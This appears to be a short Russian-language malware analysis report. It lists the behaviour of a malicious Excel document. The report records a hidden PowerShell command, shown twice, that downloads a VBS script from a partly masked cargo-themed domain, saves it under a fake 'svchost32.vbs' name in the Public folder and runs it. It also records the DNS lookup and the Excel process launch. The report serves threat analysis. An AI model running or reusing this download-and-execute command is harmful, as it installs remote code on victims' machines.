Техническая информация
- http://fa###cargo.com/images/file/vb/21.vbs как c:\users\public\\svchost32.vbs
- '<SYSTEM32>\cmd.exe' /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fa###cargo.com/images/file/vb/21.vbs','%Public%\\svchost32.vbs');Start-Process '%Public%\\svchost32.vbs'
- http://fa###cargo.com/images/file/vb/21.vbs
- DNS ASK fa###cargo.com
- '<SYSTEM32>\cmd.exe' /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fa###cargo.com/images/file/vb/21.vbs','%Public%\\svchost32.vbs');Start-Process '%Public%\\svchost32.vbs'' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding